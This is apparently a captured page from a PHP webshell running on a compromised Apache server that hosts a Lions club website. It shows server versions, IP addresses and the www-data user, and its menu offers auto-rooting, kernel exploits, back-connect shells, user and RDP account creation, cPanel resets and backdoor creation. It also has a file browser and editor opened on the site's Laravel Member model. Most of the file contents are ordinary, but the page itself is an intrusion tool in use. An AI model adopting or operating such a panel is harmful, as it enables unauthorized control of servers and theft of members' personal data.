Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.117.184.55
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
AnalyticsPage.php
329
B
-rw-r--r--
AnalyticsVisitor.php
334
B
-rw-r--r--
AttachFile.php
181
B
-rw-r--r--
Banner.php
305
B
-rw-r--r--
Comment.php
311
B
-rw-r--r--
Contact.php
300
B
-rw-r--r--
ContactsGroup.php
293
B
-rw-r--r--
Country.php
178
B
-rw-r--r--
Event.php
176
B
-rw-r--r--
Language.php
179
B
-rw-r--r--
Map.php
306
B
-rw-r--r--
Member.php
1.62
KB
-rwxr-xr-x
Menu.php
442
B
-rw-r--r--
Permissions.php
291
B
-rw-r--r--
Photo.php
308
B
-rw-r--r--
RelatedTopic.php
333
B
-rw-r--r--
Section.php
1001
B
-rw-r--r--
Setting.php
178
B
-rw-r--r--
Topic.php
2.09
KB
-rw-r--r--
TopicCategory.php
323
B
-rw-r--r--
TopicField.php
181
B
-rw-r--r--
User.php
1.55
KB
-rw-r--r--
Webmail.php
481
B
-rw-r--r--
WebmailsFile.php
292
B
-rw-r--r--
WebmailsGroup.php
293
B
-rw-r--r--
WebmasterBanner.php
295
B
-rw-r--r--
WebmasterSection.php
931
B
-rw-r--r--
WebmasterSectionField.php
324
B
-rw-r--r--
WebmasterSetting.php
187
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Member.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Member extends Model { use HasFactory; // Define the table associated with the model protected $table = 'members'; // Specify the fields that are mass assignable protected $fillable = [ 'full_name', 'full_address', 'mobile_numbers', 'position', 'district', 'dob', 'yoj', 'hc', 'photo', 'profession', 'spouse_name', 'blood_group', 'spouse_blood_group', 'wedding_date', 'email_id', 'start_date', 'end_date', 'memberid', 'description', 'category', 'sort', 'international', 'slogan' ]; // Optionally, define the fields that should be treated as dates protected $dates = [ 'wedding_date' ]; // Mutator to capitalize the first letter of each word in full_name public function setFullNameAttribute($value) { $this->attributes['full_name'] = ucwords(strtolower($value)); } // Accessor to capitalize the first letter of each word in full_name public function getCamelCaseNameAttribute() { return $this->convertToCamelCase($this->attributes['full_name']); } // Helper function to convert to camel case private function convertToCamelCase($value) { // Convert each word to have the first letter capitalized return preg_replace_callback( '/(?:^|\s|\.)([a-z])/', function ($matches) { return strtoupper($matches[0]); }, strtolower($value) ); } }
Close